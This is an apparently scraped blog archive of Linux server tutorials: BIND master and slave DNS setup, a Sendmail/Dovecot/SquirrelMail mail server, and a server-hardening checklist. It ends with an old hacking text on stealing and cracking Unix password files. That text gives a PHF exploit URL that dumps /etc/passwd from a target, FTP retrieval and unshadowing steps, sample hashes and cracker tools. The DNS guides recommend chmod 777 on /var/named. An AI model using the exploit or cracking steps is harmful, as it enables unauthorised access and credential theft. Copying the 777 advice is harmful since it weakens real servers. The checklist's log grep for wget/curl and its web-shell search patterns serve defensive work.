Archive for the ‘Linux Server’ Category

DNS: Linux Bind Installation

Posted: August 4, 2010 in DNS, LINUX

What is bind?

BIND is alternative software for translating domain names into IP addresses. Because domain names are alphabetic, they are easier to remember. So if we will browse the Internet we don’t need to remember IP addresses. For example, the domain name http://www.yourdomain.com might translate to 192.168.0.1.

1. You Can Check BIND Packet

[root@server named]# rpm -qa bind*

bind-libs-9.2.4-2
bind-utils-9.2.4-2
bind-9.2.4-2

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

3. Setting File /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//
options {
   directory "/var/named";
   dump-file "/var/named/data/cache_dump.db";
   statistics-file "/var/named/data/named_stats.txt";
/*
 * If there is a firewall between you and nameservers you want
 * to talk to, you might need to uncomment the query-source
 * directive below.  Previous versions of BIND always asked
 * questions using port 53, but BIND 8.1 uses an unprivileged
 * port by default.
 */
 // query-source address * port 53;
};

//
// a caching only nameserver config
//
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
   type master;
   file "localhost.zone";
   allow-update { none; };
};

zone "yourdomain.com" IN {
   type master;
   file "/var/named/yourdomain.com.zone";
   allow-update { none; };
};

zone "0.168.192.in-addr.arpa" IN {
   type master;
   file "/var/named/0.168.192.rev";
   allow-update { none; };
};

include "/etc/rndc.key";

4. Setting File /var/named/yourdomain.com.zone

First you must create the file yourdomain.com.zone; you can use this syntax: [root@server ~]# nano /var/named/yourdomain.com.zone
$TTL            86400
@                 IN SOA            yourdomain.com.  root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D )    ; minimum
@                   IN NS                 ns1.yourdomain.com.
@                   IN A                 192.168.0.1
ns1                 IN A                 192.168.0.1
@                   IN MX   10           mail.yourdomain.com.
mail                IN A                 192.168.0.1
WWW                 IN A                 192.168.0.1

5. Setting File /var/named/0.168.192.rev

First you must create the file 0.168.192.rev; you can use this syntax: [root@server ~]# nano /var/named/0.168.192.rev
$TTL    86400
@                 IN SOA          yourdomain.com. root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D)     ; minimum

@                 IN NS            ns1.yourdomain.com.
1                 IN PTR           binggo.yourdomain.com

6. nslookup yourdomain.com

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.1
Address:        192.168.0.1#53

Name:   yourdomain.com
Address: 192.168.0.1

7. dig yourdomain.com

[root@server ~]# dig yourdomain.com

8. Configuration For NS 1 Is Finished

If you see errors, you can try to change the permissions of the folder /var/named.

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/198.99.208.rev’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/data’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/yourdomain.com.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves’ changed to 0777 (rwxrwxrwx)

9. Check The /var/log/messages Log To Find Out If There Are Errors

[root@server ~]# tail /var/log/messages

————————————————–

Document Source: http://www.howtoforge.com/bind-installation-on-centos

Installation Of BIND As A Secondary (Slave) DNS Server

After we have installed BIND as a master DNS server (NS1) (as explained in my recent post), we can now try to set up a secondary DNS server (NS2) with BIND on CentOS. NS2 acts as a backup if there are problems with NS1.

Make sure you’ve successfully set up NS1, as described in my previous post!

NS1 with IP 192.168.0.1
NS2 with IP 192.168.0.2
Our domain: yourdomain.com

Now we can try setting up NS2.

1.  Check your Bind package

[root@server ~]# rpm -qa bind*

bind-libs-9.2.4-2

bind-utils-9.2.4-2

bind-9.2.4-2

2. Setting file /etc/resolv.conf

[root@server ~]# nano /etc/resolv.conf

nameserver 192.168.0.1

3. Setting file /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//

options {
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";

/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/

// query-source address * port 53;
allow-transfer {208.99.198.184/32;};
};

//
// a caching only nameserver config
//

controls {
inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
type master;
file "localhost.zone";
allow-update { none; };
};

zone "yourdomain.com" IN {
type slave;
file "/var/named/yourdomain.com.zone";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

zone "0.168.192.in-addr.arpa" IN {
type slave;
file "/var/named/0.168.192.rev";
// allow-update { none; };
allow-transfer { 192.168.0.1/32; };
masters { 192.168.0.1; };
};

include "/etc/rndc.key";

4. Change permission of the directory /var/named

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.zero’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/localhost.zone’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/data’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.local’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.ca’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.ip6.local’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/localdomain.zone’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/named.broadcast’ changed to 0777 (rwxrwxrwx)

mode of `/var/named/slaves’ changed to 0777 (rwxrwxrwx)

5. The files /var/named/yourdomain.com and /var/named/0.168.192.rev will automatically be copied to NS2.

6. Running service named

[root@server ~]# service named restart

Stopping named: [ OK ]

Starting named: [ OK ]

7. And check in log file what’s the matter???

[root@server ~]# tail /var/log/messages

Aug 3 04:25:42 server named[9362]: listening on IPv4 interface venet0:0, 192.168.0.2#53
Aug 3 04:25:42 server named[9362]: command channel listening on 127.0.0.1#953
Aug 3 04:25:42 server named[9362]: zone localhost/IN: loaded serial 42
Aug 3 04:25:42 server named[9362]: running
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: transferred serial 100
Aug 3 04:25:42 server named[9362]: transfer of ‚Äėyourdomain.com/IN‚Äô from 192.168.0.1#53: end of transfer
Aug 3 04:25:42 server named[9362]: zone yourdomain.com/IN: sending notifies (serial 100)
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: transferred serial 100
Aug 3 04:25:43 server named[9362]: transfer of ‚Äė0.168.192.in-addr.arpa/IN‚Äô from 192.168.0.1#53: end of transfer
Aug 3 04:25:43 server named[9362]: zone 0.168.192.in-addr.arpa/IN: sending notifies (serial 100)

Looking at this log, you can see that the yourdomain.com zone gets transferred. Actually this file is copied to NS2 so, if NS1 is dead or has a problem, NS2 has a backup configuration.

8. Result using nslookup

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.1

Address: 192.168.0.1#53

Name: yourdomain.com

Address: 192.168.0.1

answered from nslookup used server from NS1 with IP 192.168.0.1

Now we can try to deactivate NS1 to see if name resolution is still working.

9. First adding nameserver 192.168.0.2

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

nameserver 192.168.0.2

This domain is using NS2 because NS1 is not active. We don’t need to change any files on NS2 because all zone files are transferred from NS1 to NS2.

10. Trying a DNS lookup while NS1 is down

[root@server ~]# nslookup yourdomain.com

Server: 192.168.0.2

Address: 192.168.0.2#53

Name: yourdomain.com

Address: 192.168.0.1

Now if there’s any problem with NS1 you can rest calm because NS2 acts as a backup.

Document Source: http://www.howtoforge.com/installation-of-bind-as-a-secondary-slave-dns-server-on-centos

Advertisements

This tutorial explains how you can install and configure SquirrelMail on a RedHat/CentOS/Fedora based mail server which uses Sendmail and Apache.

Scenario:

Primary Mail Server: linuxbox4 (192.168.0.14)
Domain Name: abc.com
Trusted IP Pool: 192.168.0.0/24

Note: Replace domain name and system name and IP according to your scenario.

Prerequisites:

1.  DNS is configured with proper MX record.
2.  All necessary packages/ softwares are installed.

Step 1:

Configure all service to start at boot time.

chkconfig sendmail on
chkconfig httpd  on
chkconfig dovecot on

Step 2:

Configure /etc/hosts file. In this scenario /etc/hosts file should look like this:

192.168.0.14    linuxbox4   www.abc.com 


Step 3:
 
Outgoing Mail Server Configuration (Sendmail):
 
Open /etc/mail/sendmail.mc file and change the following two lines.
 
From:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
FEATURE(`accept_unresolvable_domains')dnl 


To: 

dnl DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl 
dnl FEATURE(`accept_unresolvable_domains')dnl 


Save and exit.
 
- First line here enables sendmail to receive incoming emails on all  installed the NICs. Otherwise mail server would only be able to receive  mails from it.

- Second line here tells sendmail, do not receive emails from mail  servers whose PTR record is not configured in DNS server. This is a  basic level SPAM control settings in sendmail.
 
Generate sendmail.cf file from sendmail.mc file.
 
m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf
 
 

Step 4:

Allow RELAY for trusts (organization's) IP addresses that you want to permit sending emails using this mail server. Open /etc/mail/access in this file we specify all those addresses that will be sending emails through this mail server. At the end of this file add the following line:
192.168.0 RELAY 


Save and exit and convert this text database into DB format by following command.
 
makemap hash access.db < access
 
 

Step 5:

Tell sendmail that it will be acting as a primary mail server for "abc.com" domain. We do this by adding domain name in /etc/mail/local-host-names. If this server is acting as a mail server for more then one domains then add names of all of the domains in this file on separate line. Open /etc/mail/local-host-names and add "abc.com" at the end of this file. Note: A mail server can act as a primary mail server for more then one domains at the same time and as well as can act as a primary and secondary mail server for more than one domain at the same time.  

Step 6:

All system users are mail users as well. Now create mail only users. useradd -s /usr/sbin/smrsh mailuser1 useradd -s /usr/s2n/smrsh mailuser1 Also set their passwords: passwd mailuser1 passwd mailuser2  

Step 7:

Finally restart sendmail service. service sendmail restart

Step 8:

Incoming Mail Server Configuration (Dovecot): Open /etc/dovecot.conf and change the following lines. From:
#protocols = imap  pop3

To:

protocols = imap imaps pop3 pop3s  


Save and exit and restart dovecot service.
 
service dovecot restart
 
 
 
 

Step 9:

Webserver Configuration (Apache): Apache  comes  pre-configured, you  just  have  to  change the ServerName parameter  in /etc/httpd/conf/httpd.conf  file and restart the service, that’s all. Open /etc/httpd/conf/httpd.conf  and set the ServerName parameter.
ServerName www.abc.com 


Save and exit and restart httpd service.
 
service httpd restart
 
 

Installation & Configuration of Squirrelmail 

‚Äʬ† Check that Squirrelmail is installed on the system. # rpm ‚Äďq squirrelmail ‚Äʬ† If squirrelmail is not installed on the system then install it through rpm: # rpm ‚Äďivh squirrelmail ‚Äʬ† Now go to the squirrelmail directory, located in /usr/share. # cd /usr/share/squirrelmail ‚Äʬ† Then go to the config directory: # cd config ‚Äʬ† Now run one of the following commands to configure squirrelmail. # ./conf.pl OR perl conf.pl ‚Äʬ† Now select option 1 (Organization Preferences). Organization Name¬† :¬† YOUR_ORG_NAME Organization Title¬† :¬† YOUR_ORG_NAME Webmail¬† Provider link¬†¬†¬† :¬† http://YOUR_ORG_SITE_ADDRESS Provider name¬† :¬† YOUR_ORG_NAME ‚Äʬ† Now select option 2 (Server Settings). Domain¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† :¬† abc.com Sendmail or SMTP :¬† Sendmail IMAP Server¬†¬†¬†¬†¬†¬†¬†¬†¬† :¬† localhost IMAP Port¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† :¬† 143 Server software¬†¬†¬†¬† :¬† uw Delimiter¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† :¬† / ‚Äʬ† Now select option 3 (Folder Settings). Default Folder Prefix¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : mail/ Show Folder Prefix Option¬†¬†¬†¬†¬†¬† : true Trash Folder¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : Trash Sent Folder¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : Sent Drafts Folder¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : Drafts By default, move to trash¬†¬†¬†¬†¬†¬†¬† : true By default, move to sent¬†¬†¬†¬†¬†¬†¬†¬† : true By default, save as draft¬†¬†¬†¬†¬†¬†¬†¬†¬† : true List Special Folders First¬†¬†¬†¬†¬†¬†¬†¬† : true Show Special Folders Color¬†¬†¬† : true Auto Expunge¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : true Default Sub. of INBOX¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : false Show 'Contain Sub.' Option¬†¬†¬† : true Default Unseen Notify¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : 2 Default Unseen Type¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : 1 Auto Create Special Folders¬†¬† : true Folder Delete Bypasses Trash¬† : false Enable /NoSelect folder fix¬†¬† : false ‚Äʬ† Now select option 4 (General Settings). Data Directory¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : /var/lib/squirrelmail/prefs/ Attachment Directory¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : /var/spool/squirrelmail/attach/ Directory Hash Level¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : 0 Default Left Size¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : 150 Usernames in Lowercase¬†¬†¬†¬† : false Allow use of priority¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : true Hide SM attributions¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : false Allow use of receipts¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : true Allow editing of identity¬†¬†¬†¬†¬†¬†¬† : true Allow editing of name¬†¬†¬†¬†¬†¬†¬†¬†¬† : true Remove username from header : false Allow server thread sort¬†¬†¬†¬†¬†¬† : true Allow server-side sorting¬†¬†¬†¬† : true Allow server charset search : true Enable UID support¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : true PHP session name¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : SQMSESSID Location base¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬†¬† : ‚Äʬ† Now choose option 8 (Plugins) and select the plugins that you wish to provide to your webmail users. ‚Äʬ† Now open the browser with the following link: http://YOUR_SITE_ADDRESS/webmail OR http://192.168.0.14/webmail

How to Secure a Linux Server.

1. Kernel recompile with GR security

2. firewall = CSF

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To modify LogWatch, SSH into server and login as root. At command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change to

Mailto = your@email.com

Note: Set the e-mail address to an offsite account incase you get hacked.

Now scroll down to

Detail = Low

Change that to Medium, or High…

Detail = 5 or Detail = 10

Note: High will give you more detailed logs with all actions. Save and exit.

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:


1. Login to your server via SSH as root. Then Type: cd /usr/local/src/

2. Download RKHunter Version 1.1.4

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Lets setup RKHunter to e-mail you you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add The Following:

1.  !/bin/bash

(/usr/local/bin/rkhunter -c –cronjob 2>&1 | mail -s “RKhunter Scan Details” replace-this@with-your-email.com)

Replace the e-mail above with your e-mail!!

It is best to send the e-mail to an e-mail off-site so that

if the box IS compromised the hacker can’t erase the scan report unless he hacks another server too.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit


   [root@server ~]# wget >>ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# ./chkrootkit*/chkrootkit

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp /var/tmp /dev/shm

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove SUID/GUID from binaries

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php for enable_dl = enable_dl = Off

50. Check php for disable_functions=

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, allow_url_fopen

51. Check php for register_globals register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add Load Alert Scripts with 1 min cron

   #!/bin/bash
   #uptime alerti script ..
   UP=`uptime|awk '{print $(NF-2)}'|cut -d. -f1`
   if test $UP -gt 4
   then
   `uptime| mail -s "**SERVER LOAD is $UP" mailadd@mail.com`
   fi

89. ignore ping :

1.  iptables -A INPUT -p icmp -j DROP

echo 1>/proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directory with 777 permission.

              find . -type d -perm 777

91.Check for open ports using nmap command.

92. Disable identification output for Apache

To disable the version output for proftp, SSH into server and login as root.

At command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following line to

ServerSignature Off

Restart Apache

At command prompt type: /etc/rc.d/init.d/httpd restart

93.Change ssh ListenAddress /etc/ssh/sshd_config

94.PermitRootLogin no

95.Add root login alert

vi .bash_profile

   echo 'ALERT - Root Shell Access on:' `date` `who`
   | mail -s "Alert: Root Access from `who | awk '{print $6}'`" your@email.com

96.Set an SSH Legal Message in /etc/motd

97.Locate.

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98.Perform some udp and tcp scan here :

http://www.hackerwatch.org/probe/

This site is not bad too : https://grc.com/x/ne.dll?bh0bkyd2

99.Check /var/log/secure , /var/log/messages and other log files of services running to see if there are any issues.

100.Check your box to see if your performance has degraded or if your machine is being over used.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes.

lsof

101. List all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

    chmod -R 700 /etc/rc.d/init.d/*
    Use rpm -Va to find out if an rpm is modified
    * Apply security patches to vulnerable software (ie. patch -p1 < patch file)
    * Remove all unneeded ttys and console logins by removing the entry from /etc/securetty
    * Check system logs (eg: /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (nagios or big brother)

102. Install AIDE (Advanced Intrusion Detection Environment) is a free

replacement for Tripwire. = http://www.cs.tut.fi/~rammer/aide.html

103. Testing phase when in production.

Use tools like nessus, nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

        

find /usr/local/apache/domlogs -exec egrep -iH ‘(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20’ {} \;

 [***The Ultimate Guide Passwd Files***]

CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________________________________________

1. Introduction

Passwd files are the easist and simplist ways to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course the minute you sign on the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activites. If you choose to do illegal activies with the information from this it is no one’s fault but your own. Now down to the good stuff [=.¬†

________________________________________________________

2. What is a Passwd File

A passwd file is an encrypted file that contains the users on a servers passwords. The key word here is encrypted, so don’t start thinking all i have to do is find one and i hit the jackpot. Nope sorry Man, theres alot more to it than that. The passwd file should look something like this

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc

Out of that entire section the only name you could use would be rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc Heres how you read the File

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rcc
Username: rcc 
Encrypted Password: uXDg04UkZgWOQ 
User number: 201 
Group Number: 4 
Real Name (usually): Richard Clark 
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh 

Because it is the only name with an encrypted password.
You will never find a passwd file that has a passwd for 
anything like ftp, listen, bin, etc., etc. Occasionally 
using the PHF exploit or unshadowing a passwd file you can get an encrypted password for root. 
________________________________________________________

3. PHF Exploit

First let me explain what an exploit is. An Exploit is a hole in software that allows someone to get something out of it that… Well you aren’t supposed to.¬†
The PHF exploit is a hole in CGI, that most servers have fixed now (if they have CGI). Lets just say a very popular IRC place has a problem with their CGI. Also on the subject of servers with the exploit open, many forien servers have this open. Unlike the FTP Passwd you don’t even have to access their FTP or login. What you do is get a WWW browser and then in the plass for the WWW address type:
http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd
In http://www.target.com Place who’s passwd you want to get. If you get a message like “The requested object does not exist on this server. The link you followed is either outdated, inaccurate,
or the server has been instructed not to let you have it.” its not there. If you get “You have been caught on Candid Camera!” They caught you, but don’t fear they rarly ever Report you. I have yet to find a server that does report. Of course if you get “root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0: 
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing 
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh”
You have hit the jackpot [=. Save the file as a text and keep it handy, because you will need it for later in the lesson. 

________________________________________________________________

4. FTP Passwd

The Passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP has a non-anonymous logins rule. If you are desprite to get a passwd file from a certain server (which may not even be open, so only do if you are desprite or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS FTP or CuteFTP. Find the servers name and connect to it. You should get a list of Directories like “etc, hidden, incoming, pub” goto the one called etc. inside etc should be a few files like “group, passwd” if any chance you see one called shadow there is a 8/10 chance you are about to deal with a shadowed passwd. Well get the passwd file and maybe check out what else is on the server so it won’t look so suspious. Anyway when you log out, run and check out your new passwd file. If you only see names like “root, daemon, FTP, nobody, ftplogin, bin” with * beside their names where the encrypted passwd should be, you got a passwd file that you cannot crack. But if it happens to have user names (like rcc:*: or ggills:*:” with a * (or another symbol) you have a shadowed passwd. Of course if you have been reading and paying attention if you have something that has a few things that look like:
“joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh”
You have gotten one you can crack [=. 
________________________________________________________________

5. Shadowed Passwd’s

Now if you happen to find a passwd fiel that looks something like this: “joetest:*:102:100::/home/joetest:/usr/bin/restsh”
which has a user name, not a programs, you have a shadowed passwd. The shadow file has the encrypted passwords on it. Depending on the Operating System, the passwd file may be in different places. To find out what Operating system your target is running from telnet (connected to that server of course) type uname -a and it should say, if you cannot get to telnet there is other methods of finding out. Here is a guide to systems passwd file locations (taken from a text on passwd files by Kryto.) A token is the * (or other symbol) beside a shadowed passwds user name

UNIX Paths (Courtesy of 2600) 

UNIX Path Token 
—————————————————————-¬†
AIX 3 /etc/security/passwd ! 
or /tcb/auth/files/<first letter # 
A/UX 3.0s /tcb/files/auth/?/ * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files/<first letter of username> /<username> * SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow <optional NIS+ private secure maps/tables/whatever 
System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database 
Ultrix 4 /etc/auth[.dir|.pag] * 
UNICOS /etc/udb * Anyway once you have the passwd file (with user names) and shadow file you can find a unshadowing program which combines the passwd file and the shadow passwd and combines them into what a regualr passwd file would be. A unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip Now some servers have the shadow file on retrictions so no one without a special account on the server can get to it. 
________________________________________________________________

6. Crackers

Now that you have gotten a passwd file, what the hell do you do it it to get passwords from it? Thats where crackers come in.
A cracker takes the passwd file and a wordlist and compares the wordlist to the passwd files encrypted passwd. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1 
http://tms.netrom.com/~cassidy/utils/pacec.zip
Many people swear that John the Ripper is the greatest but i have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A Cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the unencrypted password. You don’t need to write it down because the program auto saves it. Cracker Jack saves the file as jack.pot and i think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it to the files name (ex., passwd.txt.db) with the exact name and makes it a .DB file. I like to keep a passwd file once i have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps [=.¬†
___________________________________________________________________________

7. Wordlists 

Wordlists are a nessicity to cracking passwd files. They are just huge lists of words. The biggest wordlist is avaliable from here: ftp://ftp.ox.ac.uk/pub/wordlists/ 
